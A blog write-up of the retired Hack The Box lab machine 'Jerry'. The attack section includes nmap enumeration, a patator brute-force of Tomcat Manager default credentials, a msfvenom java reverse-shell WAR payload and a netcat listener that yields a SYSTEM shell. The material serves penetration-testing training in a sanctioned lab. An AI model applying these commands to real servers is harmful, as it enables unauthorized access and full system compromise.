Hack the Box Write-up #1: Jerry

11 minute read

A while back I signed up for hackthebox.eu, but then somehow left the account sitting idle for quite some time as I was busy with work and doing my eCPPT.

Having finished the PTP course and some free time available, I started to do some of the active machines and yesterday – after getting VIP access – also some of the “retired” boxes.

As posting write-ups for retired machines is “fair game”, I thought I’d start a blog series of walk-throughs.

Today I start with “Jerry” as an easy first box.


As a first step let’s scan the target with nmap. The options I include are -sV for version detection, -sC for default scripts and -oN for saving the results in nmap format. This will scan the 1000 most common ports, run scripts and perform version enumeration (we’ll se a lot more of nmap in future write-ups).

$ nmap -sV -sC -oN nmap/init

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

We can see from the nmap script results that there’s a tomcat instance running on port 8080.

Manually visiting, we confirm that it is indeed the default Tomcat start page.

Clicking on the “Manager App”, we quickly realize that we need some credentials, though.

A search for known vulnerabilties and exploits for this Tomcat version does not result in anything useful. So, ater trying a couple of default credentials manually, we can turn to a brute-forcing tool to test more default credentials faster. Let’s use patator this time.

An app-specific dictionary can be found in SecLists (Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt).

$ patator http_fuzz url= user_pass=COMBO00:COMBO01 0=/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt -x ignore:code=401 -x ignore:code=403

16:31:35 patator    INFO - code size:clen       time | candidate                          |   num | mesg
16:31:35 patator    INFO - -----------------------------------------------------------------------------
16:31:36 patator    INFO - 200  19262:-1       0.062 | tomcat:s3cret                      |    73 | HTTP/1.1 200 OK
16:31:36 patator    INFO - 200  19262:-1       0.061 | tomcat:s3cret                      |    74 | HTTP/1.1 200 OK

tomcat and s3cret it is! That was fast.


Using the discovered credentials, we can access the “Manager App” at

Tomcat Manager App

The app allows us to deploy our own web application as a WAR file, making it easy to get code execution on the remote system.

We could now manually create the WAR archive or use a generator. I will use msfvenom in this case and choose an unstaged java reverse tcp payload. You could also go with the regular staged meterpreter payload if you’d like a smaller payload and use all the advantages meterpreter gives you.

$ msfvenom -p java/shell_reverse_tcp LHOST= LPORT=9090 -f war -o shell.war

After generating our shell.war, we deploy it (upload) using the “Manager App” and start a netcat listener on our machine:

nc -lvnp 9090

Opening we can now trigger our payload and will be greeted with a shell.

Ncat: Listening on :::9090
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

nt authority\system

As you can see, we’re immediately SYSTEM and don’t need any more privilege escalation.

I hope you’ve enjoyed this write-up. If you have any questions, did it another way or have something else to say, feel free to leave a comment. I’m always happy to learn new things. You can also check out the other write-ups.

Leave a Comment